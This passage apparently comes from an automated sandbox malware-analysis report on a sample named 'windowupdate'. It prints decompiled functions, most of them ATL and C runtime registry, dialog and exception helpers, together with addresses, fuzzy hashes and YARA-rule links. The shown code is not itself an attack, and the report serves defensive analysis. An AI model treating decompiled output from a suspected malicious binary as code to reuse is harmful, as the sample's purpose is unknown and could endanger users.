				E00D4F350(_a4, 1);
				return _a4;
			}






















                      0x00d55356
                      0x00d55360
                      0x00d55374
                      0x00d5537d
                      0x00d55380
                      0x00d553c9
                      0x00d553cd
                      0x00d553d8
                      0x00d553e0
                      0x00d553e2
                      0x00d55444
                      0x00d55444
                      0x00d5544c
                      0x00d5544e
                      0x00d55469
                      0x00d55450
                      0x00d5545a
                      0x00d5545a
                      0x00d5546f
                      0x00d55479
                      0x00000000
                      0x00d5547e
                      0x00d553e4
                      0x00d553ec
                      0x00d553f4
                      0x00d553fe
                      0x00d55401
                      0x00d55404
                      0x00d55408
                      0x00d55425
                      0x00d55429
                      0x00000000
                      0x00000000
                      0x00d5542e
                      0x00d55437
                      0x00000000
                      0x00d5543f
                      0x00d5540d
                      0x00d55416
                      0x00000000
                      0x00d5541e
                      0x00d55382
                      0x00d55388
                      0x00d5538b
                      0x00d5538e
                      0x00000000
                      0x00000000
                      0x00d55390
                      0x00d5539b
                      0x00d5539c
                      0x00d5539f
                      0x00d553a2
                      0x00d553ab
                      0x00d553bc
                      0x00000000
                      0x00d553c1
                      0x00d55367
                      0x00000000

                      APIs
                      • DName::DName.LIBVCRUNTIMED ref: 00D55367
                        • Part of subcall function 00D4F350: DNameStatusNode::make.LIBVCRUNTIMED ref: 00D4F3AE
                      • DName::DName.LIBVCRUNTIMED ref: 00D553BC
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Name$Name::$Node::makeStatus
                      • String ID: A
                      • API String ID: 3739413223-3554254475
                      • Opcode ID: 3b80280f030cbf19f0c361f2702c51170e0437bd42074c922000bd7cdfa12582
                      • Instruction ID: 03f2c58ef281517d8422bddf3a80b7f7156a37895acdb5134e09d37f9b605508
                      • Opcode Fuzzy Hash: 3b80280f030cbf19f0c361f2702c51170e0437bd42074c922000bd7cdfa12582
                      • Instruction Fuzzy Hash: 5D413071900518EFDF14DF94E8A19AE7BB5FF84302F148059FD0A9B266DB30AA45DBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D345F0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 101registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 66%
                      			E00D345F0(void* __ecx, void* __esi, void* _a4, char* _a8, int _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _t37;
				long _t39;
				void* _t44;
				void* _t48;
				void* _t64;
				void* _t69;
				void* _t70;

				_t68 = __esi;
				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t72 = _a4;
					if(_a4 == 0) {
						_t37 = L00D84930(_t72, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x16fb, 0, "%ls", L"hKeyParent != 0");
						_t70 = _t70 + 0x18;
						if(_t37 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				_v16 = 0;
				if( *((intOrPtr*)(_v8 + 8)) == 0) {
					_t68 = _t70;
					_t64 = _a4;
					_t39 = RegOpenKeyExA(_t64, _a8, 0, _a12,  &_v16);
					__eflags = _t70 - _t70;
					_v28 = E00DC1520(_t39, _t70 - _t70);
				} else {
					_t64 = _a8;
					_v28 = E00D330F0( *((intOrPtr*)(_v8 + 8)), _t68, _a4, _t64, 0, _a12,  &_v16);
				}
				_v24 = _v28;
				if(_v24 == 0) {
					_v24 = E00D34420(_v8, _t68);
					_t77 = _v24;
					if(_v24 != 0) {
						_t48 = L00D84930(_t77, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1703, 0, "%ls", L"lRes == 0L");
						_t70 = _t70 + 0x18;
						if(_t48 == 1) {
							asm("int3");
						}
					}
					 *_v8 = _v16;
					_t64 = _v8;
					 *(_t64 + 4) = _a12 & 0x00000300;
				}
				_push(_t64);
				_push(_v24);
				E00DC14C0(_t69, 0xd34718);
				_pop(_t44);
				return E00DC1520(_t44, _t69 - _t70 + 0x18);
			}
















                      0x00d345f0
                      0x00d345fc
                      0x00d345ff
                      0x00d34602
                      0x00d34605
                      0x00d34608
                      0x00d3460b
                      0x00d3460e
                      0x00d34611
                      0x00d34611
                      0x00d34615
                      0x00d3462f
                      0x00d34634
                      0x00d3463a
                      0x00d3463c
                      0x00d3463c
                      0x00d3463a
                      0x00d3463d
                      0x00d34641
                      0x00d3464f
                      0x00d34673
                      0x00d34683
                      0x00d34687
                      0x00d3468d
                      0x00d34694
                      0x00d34651
                      0x00d3465b
                      0x00d3466e
                      0x00d3466e
                      0x00d3469a
                      0x00d346a1
                      0x00d346ab
                      0x00d346ae
                      0x00d346b2
                      0x00d346cc
                      0x00d346d1
                      0x00d346d7
                      0x00d346d9
                      0x00d346d9
                      0x00d346d7
                      0x00d346e0
                      0x00d346eb
                      0x00d346ee
                      0x00d346ee
                      0x00d346f4
                      0x00d346f7
                      0x00d346fe
                      0x00d34703
                      0x00d34713

                      APIs
                      • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,00000000,?,00D3AED1,00000000,?), ref: 00D34687
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D346FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckOpenStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$hKeyParent != 0$lRes == 0L
                      • API String ID: 2727503844-1643637747
                      • Opcode ID: ace5eccaf8163be01836a6967a7076f1784fef2a1fd0c34dd5f231ad85623d9b
                      • Instruction ID: 3325758f5375222320e36c00973665940304081d374d5997cc2f2d36e15785f2
                      • Opcode Fuzzy Hash: ace5eccaf8163be01836a6967a7076f1784fef2a1fd0c34dd5f231ad85623d9b
                      • Instruction Fuzzy Hash: 06315075E00209EFCB14EF98D952FEEB7B4EB49700F148159E505A7281E674AE40CBF1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3C1E0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 98COMMON
                      Download Yara Rule
                      C-Code - Quality: 66%
                      			E00D3C1E0(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr* _v12;
				char _v24;
				intOrPtr* _v32;
				intOrPtr _v36;
				char _v44;
				intOrPtr* _t35;
				void* _t42;
				intOrPtr _t46;
				void* _t48;
				void* _t50;
				intOrPtr _t67;
				void* _t74;
				void* _t75;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t80;

				_t67 = __edx;
				_t74 =  &_v44;
				memset(_t74, 0xcccccccc, 0xa << 2);
				_t79 = _t78 + 0xc;
				_t75 = _t74 + 0xa;
				if(_a4 != 0) {
					_v8 = 0;
					_push(0xdc8724);
					_t35 = E00D479A0(0xc);
					_t80 = _t79 + 8;
					_v32 = _t35;
					_v12 = _v32;
					__eflags = _v12;
					if(_v12 != 0) {
						 *_v12 = _a8;
						 *((intOrPtr*)(_v12 + 4)) = _a12;
						E00D41D00(__ebx,  &_v24, _t75, __esi, _a4 + 0xc, 0);
						_v8 = E00D41D90( &_v24, __esi);
						__eflags = _v8;
						if(__eflags < 0) {
							_t67 = _v12;
							_v36 = _t67;
							E00D482A0(_v36);
							_t42 = E00D3F210(0xf23704);
							E00D323E0(__ebx, _t75, __esi, __eflags, E00D323B0( &_v44, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20fc), _t42, 0, "ERROR : Unable to lock critical section in AtlModuleAddTermFunc\n", 0xc);
							_t80 = _t80 + 0x18;
							__eflags = 0;
							if(0 == 0) {
								_t50 = L00D84930(0, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x20fd, 0, "%ls", 0xde40dc);
								_t80 = _t80 + 0x18;
								__eflags = _t50 - 1;
								if(_t50 == 1) {
									asm("int3");
								}
							}
						} else {
							_t67 =  *((intOrPtr*)(_a4 + 8));
							 *((intOrPtr*)(_v12 + 8)) = _t67;
							 *((intOrPtr*)(_a4 + 8)) = _v12;
						}
						E00D41D60( &_v24);
					} else {
						_v8 = 0x8007000e;
					}
					_t46 = _v8;
				} else {
					_t46 = 0x80070057;
				}
				_push(_t67);
				E00DC14C0(_t77, 0xd3c31c);
				_t48 = _t46;
				return E00DC1520(_t48, _t77 - _t80 + 0x28);
			}





















                      0x00d3c1e0
                      0x00d3c1e7
                      0x00d3c1f4
                      0x00d3c1f4
                      0x00d3c1f4
                      0x00d3c1fa
                      0x00d3c206
                      0x00d3c20d
                      0x00d3c214
                      0x00d3c219
                      0x00d3c21c
                      0x00d3c222
                      0x00d3c225
                      0x00d3c229
                      0x00d3c23d
                      0x00d3c245
                      0x00d3c254
                      0x00d3c261
                      0x00d3c264
                      0x00d3c268
                      0x00d3c281
                      0x00d3c284
                      0x00d3c28d
                      0x00d3c2a1
                      0x00d3c2ba
                      0x00d3c2bf
                      0x00d3c2c2
                      0x00d3c2c4
                      0x00d3c2de
                      0x00d3c2e3
                      0x00d3c2e6
                      0x00d3c2e9
                      0x00d3c2eb
                      0x00d3c2eb
                      0x00d3c2e9
                      0x00d3c26a
                      0x00d3c270
                      0x00d3c273
                      0x00d3c27c
                      0x00d3c27c
                      0x00d3c2ef
                      0x00d3c22b
                      0x00d3c22b
                      0x00d3c22b
                      0x00d3c2f4
                      0x00d3c1fc
                      0x00d3c1fc
                      0x00d3c1fc
                      0x00d3c2f7
                      0x00d3c301
                      0x00d3c306
                      0x00d3c316

                      APIs
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00D3C301
                      Strings
                      • %ls, xrefs: 00D3C2CB
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3C2D7
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00D3C2AC
                      • ERROR : Unable to lock critical section in AtlModuleAddTermFunc, xrefs: 00D3C295
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CheckStackVars@8
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$ERROR : Unable to lock critical section in AtlModuleAddTermFunc
                      • API String ID: 930174750-2929966712
                      • Opcode ID: 2e6dac4fbc10d5f0a883ff2c5b691c7e75db0fcd76affe3ab48e8179c4b09083
                      • Instruction ID: 646c28a6dbe7294d663d8274e9b7d1329b1466e2db679f306640d75a5276bfb8
                      • Opcode Fuzzy Hash: 2e6dac4fbc10d5f0a883ff2c5b691c7e75db0fcd76affe3ab48e8179c4b09083
                      • Instruction Fuzzy Hash: C8319078E40309EFDB04EF94D842FAEB7B4EB44714F148069E805BB382D6719A44CBB5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D34960 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 93registryCOMMON
                      Download Yara Rule
                      C-Code - Quality: 67%
                      			E00D34960(void** __ecx, void* __esi, char* _a4, char* _a8) {
				void** _v8;
				char* _v12;
				int _v16;
				void** _v20;
				int _v24;
				int _v28;
				void* _t36;
				long _t41;
				void* _t42;
				void* _t44;
				void* _t45;
				void* _t58;
				void* _t59;

				_v28 = 0xcccccccc;
				_v24 = 0xcccccccc;
				_v20 = 0xcccccccc;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t61 =  *_v8;
					if( *_v8 == 0) {
						_t45 = L00D84930(_t61, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1886, 0, "%ls", L"m_hKey != 0");
						_t59 = _t59 + 0x18;
						if(_t45 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				L5:
				L5:
				if(_a8 == 0) {
					_v28 = 0;
				} else {
					_v28 = 1;
				}
				_v24 = _v28;
				_t65 = _v24;
				if(_v24 == 0) {
					_t44 = L00D84930(_t65, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x1887, 0, "%ls", L"__atl_condVal");
					_t59 = _t59 + 0x18;
					if(_t44 == 1) {
						asm("int3");
					}
				}
				if(_v24 != 0) {
					goto L13;
				}
				_t42 = 0xd;
				L17:
				return E00DC1520(_t42, _t58 - _t59 + 0x18);
				L13:
				__eflags = 0;
				if(0 != 0) {
					goto L5;
				}
				_v16 = 0;
				_v12 = _a8;
				do {
					_t36 = E00D82E00(_v12);
					_t59 = _t59 + 4;
					_v20 = _t36 + 1;
					_v12 = _v12 + _v20;
					_v16 = _v16 + _v20;
					__eflags = _v20 - 1;
				} while (_v20 != 1);
				_t41 = RegSetValueExA( *_v8, _a4, 0, 7, _a8, _v16);
				__eflags = _t59 - _t59;
				_t42 = E00DC1520(_t41, __eflags);
				goto L17;
			}
















                      0x00d3496c
                      0x00d3496f
                      0x00d34972
                      0x00d34975
                      0x00d34978
                      0x00d3497b
                      0x00d3497e
                      0x00d34981
                      0x00d34984
                      0x00d34987
                      0x00d349a1
                      0x00d349a6
                      0x00d349ac
                      0x00d349ae
                      0x00d349ae
                      0x00d349ac
                      0x00d349af
                      0x00000000
                      0x00d349b3
                      0x00d349b7
                      0x00d349c2
                      0x00d349b9
                      0x00d349b9
                      0x00d349b9
                      0x00d349cc
                      0x00d349cf
                      0x00d349d3
                      0x00d349ed
                      0x00d349f2
                      0x00d349f8
                      0x00d349fa
                      0x00d349fa
                      0x00d349f8
                      0x00d349ff
                      0x00000000
                      0x00000000
                      0x00d34a01
                      0x00d34a69
                      0x00d34a76
                      0x00d34a08
                      0x00d34a08
                      0x00d34a0a
                      0x00000000
                      0x00000000
                      0x00d34a0c
                      0x00d34a16
                      0x00d34a19
                      0x00d34a1d
                      0x00d34a22
                      0x00d34a28
                      0x00d34a31
                      0x00d34a3a
                      0x00d34a3d
                      0x00d34a3d
                      0x00d34a5b
                      0x00d34a61
                      0x00d34a63
                      0x00000000

                      APIs
                      • _strlen.LIBCMT ref: 00D34A1D
                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000007,00000000,00000000), ref: 00D34A5B
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: Value_strlen
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$__atl_condVal$m_hKey != 0
                      • API String ID: 3056571664-3821136969
                      • Opcode ID: 58f8df984a92671c2626bf8741e1cb4a73201fd59d770c834f448a1ea96e1c6c
                      • Instruction ID: 74b07e7dc7705e40fc90a00bf68223b973844af6f61a097779b6d10ee62f3f47
                      • Opcode Fuzzy Hash: 58f8df984a92671c2626bf8741e1cb4a73201fd59d770c834f448a1ea96e1c6c
                      • Instruction Fuzzy Hash: 60314D75E40219AFDB10EF99C842BAEB7B4EF54704F248159E514B7281E7B4AB40CFB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D3DD40 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                      Download Yara Rule
                      C-Code - Quality: 57%
                      			E00D3DD40(void* __ebx, intOrPtr __ecx, void* __esi, struct HWND__* _a4, long _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _t21;
				struct HWND__* _t27;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t51;
				void* _t52;

				_t35 = __ebx;
				_v16 = 0xcccccccc;
				_v12 = 0xcccccccc;
				_v8 = 0xcccccccc;
				_v8 = __ecx;
				do {
					_t21 = _v8;
					_t54 =  *((intOrPtr*)(_t21 + 4));
					if( *((intOrPtr*)(_t21 + 4)) != 0) {
						_t34 = L00D84930(_t54, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfbd, 0, "%ls", L"this->m_hWnd == 0");
						_t52 = _t52 + 0x18;
						if(_t34 == 1) {
							asm("int3");
						}
					}
				} while (0 != 0);
				_v12 = E00D3C490(_v8 + 8, 0, 0, 0);
				if(_v12 != 0) {
					E00D33B00(_t35, 0xf23710, __eflags, _v8 + 8, _v8);
					 *((char*)(_v8 + 0x20)) = 0;
					_t27 = CreateDialogParamA(E00D32B30(0xf20220), 0xca, _a4, E00D42030, _a8);
					__eflags = _t52 - _t52;
					_v16 = E00DC1520(_t27, _t52 - _t52);
					do {
						__eflags =  *((intOrPtr*)(_v8 + 4)) - _v16;
						if(__eflags != 0) {
							_t32 = L00D84930(__eflags, 2, L"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlwin.h", 0xfcf, 0, "%ls", L"this->m_hWnd == hWnd");
							_t52 = _t52 + 0x18;
							__eflags = _t32 - 1;
							if(_t32 == 1) {
								asm("int3");
							}
						}
						__eflags = 0;
					} while (0 != 0);
					_t30 = _v16;
					L13:
					return E00DC1520(_t30, _t51 - _t52 + 0xc);
				}
				SetLastError(0xe);
				E00DC1520(_t22, _t52 - _t52);
				_t30 = 0;
				goto L13;
			}














                      0x00d3dd40
                      0x00d3dd47
                      0x00d3dd4e
                      0x00d3dd55
                      0x00d3dd5c
                      0x00d3dd5f
                      0x00d3dd5f
                      0x00d3dd62
                      0x00d3dd66
                      0x00d3dd80
                      0x00d3dd85
                      0x00d3dd8b
                      0x00d3dd8d
                      0x00d3dd8d
                      0x00d3dd8b
                      0x00d3dd8e
                      0x00d3dda1
                      0x00d3dda8
                      0x00d3ddd2
                      0x00d3ddda
                      0x00d3ddfd
                      0x00d3de03
                      0x00d3de0a
                      0x00d3de0d
                      0x00d3de13
                      0x00d3de16
                      0x00d3de30
                      0x00d3de35
                      0x00d3de38
                      0x00d3de3b
                      0x00d3de3d
                      0x00d3de3d
                      0x00d3de3b
                      0x00d3de3e
                      0x00d3de3e
                      0x00d3de42
                      0x00d3de46
                      0x00d3de53
                      0x00d3de53
                      0x00d3ddae
                      0x00d3ddb6
                      0x00d3ddbb
                      0x00000000

                      APIs
                      • SetLastError.KERNEL32(0000000E), ref: 00D3DDAE
                      • CreateDialogParamA.USER32(00000000,000000CA,00000000,00D42030,CCCCCCCC), ref: 00D3DDFD
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: CreateDialogErrorLastParam
                      • String ID: %ls$C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlwin.h$this->m_hWnd == 0$this->m_hWnd == hWnd
                      • API String ID: 3445605341-3995377508
                      • Opcode ID: dcd8075b10d7eb933240ee2f5b40a27194826b9a217c787b6efd6104463a598e
                      • Instruction ID: a1b63ecb4f9c1d0f1abbc67d0e506d2c7d92642cd554651402e6ab272675460c
                      • Opcode Fuzzy Hash: dcd8075b10d7eb933240ee2f5b40a27194826b9a217c787b6efd6104463a598e
                      • Instruction Fuzzy Hash: F4217E71E40319BFDB10EB98E947F6EB776EB50700F1485A4F505BB282D6B09E408BB1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00D4BCF0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82COMMONLIBRARYCODE
                      Download Yara Rule
                      C-Code - Quality: 95%
                      			E00D4BCF0(intOrPtr* _a4, intOrPtr* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _t30;
				intOrPtr _t31;
				signed char _t38;
				intOrPtr _t59;
				void* _t67;

				if( *_a8 != 0) {
					L2:
					_t30 = L00D84930(_t72, 2, L"d:\\a01\\_work\\38\\s\\src\\vctools\\crt\\vcruntime\\src\\eh\\std_exception.cpp", 0x12, 0, "%ls", L"to->_What == nullptr && to->_DoFree == false");
					_t67 = _t67 + 0x18;
					if(_t30 == 1) {
						asm("int3");
					}
					L4:
					if(( *(_a4 + 4) & 0x000000ff) == 0 ||  *_a4 == 0) {
						_t31 =  *_a4;
						 *_a8 = _t31;
						 *((char*)(_a8 + 4)) = 0;
						return _t31;
					} else {
						_v12 = E00D82E00( *_a4) + 1;
						E00D4BBF0( &_v8, E00D85F00(_v12));
						_t38 = E00D4BC30( &_v8);
						__eflags = _t38 & 0x000000ff;
						if((_t38 & 0x000000ff) != 0) {
							_v16 =  *_a4;
							_v20 = E00D4BC80( &_v8);
							E00D82DE0(_v20, _v12, _v16);
							 *_a8 = E00D4BC50( &_v8);
							 *((char*)(_a8 + 4)) = 1;
							return E00D4BC10( &_v8);
						}
						return E00D4BC10( &_v8);
					}
				}
				_t59 = _a8;
				_t72 =  *(_t59 + 4) & 0x000000ff;
				if(( *(_t59 + 4) & 0x000000ff) == 0) {
					goto L4;
				}
				goto L2;
			}












                      0x00d4bcfc
                      0x00d4bd09
                      0x00d4bd1e
                      0x00d4bd23
                      0x00d4bd29
                      0x00d4bd2b
                      0x00d4bd2b
                      0x00d4bd2c
                      0x00d4bd35
                      0x00d4bd45
                      0x00d4bd47
                      0x00d4bd4c
                      0x00000000
                      0x00d4bd55
                      0x00d4bd66
                      0x00d4bd79
                      0x00d4bd81
                      0x00d4bd89
                      0x00d4bd8b
                      0x00d4bd9c
                      0x00d4bda7
                      0x00d4bdb6
                      0x00d4bdc9
                      0x00d4bdce
                      0x00000000
                      0x00d4bdd5
                      0x00000000
                      0x00d4bd90
                      0x00d4bd35
                      0x00d4bcfe
                      0x00d4bd05
                      0x00d4bd07
                      0x00000000
                      0x00000000
                      0x00000000

                      APIs
                      • _strlen.LIBCMT ref: 00D4BD5B
                      • __aligned_msize.LIBCMTD ref: 00D4BDB6
                      • __crt_unique_heap_ptr.LIBCMTD ref: 00D4BDC1
                        • Part of subcall function 00D4BC10: __crt_unique_heap_ptr.LIBCMTD ref: 00D4BC1A
                      Strings
                      • to->_What == nullptr && to->_DoFree == false, xrefs: 00D4BD09
                      • d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp, xrefs: 00D4BD17
                      • %ls, xrefs: 00D4BD0E
                      Memory Dump Source
                      • Source File: 00000003.00000002.522341780.0000000000D31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000003.00000002.522236136.0000000000D30000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524117626.0000000000DC6000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524355289.0000000000DF6000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524373589.0000000000DF7000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524889537.0000000000F1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524913932.0000000000F20000.00000004.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524929741.0000000000F24000.00000002.00000001.01000000.00000007.sdmpDownload File
                      • Associated: 00000003.00000002.524944796.0000000000F26000.00000002.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_d30000_windowupdate.jbxd
                      Similarity
                      • API ID: __crt_unique_heap_ptr$__aligned_msize_strlen
                      • String ID: %ls$d:\a01\_work\38\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
                      • API String ID: 3817959681-3374554652
                      • Opcode ID: 380ebe3a89da70d78dac604bbb2e92308782a52e2bae83041ce3af96d0a1da34
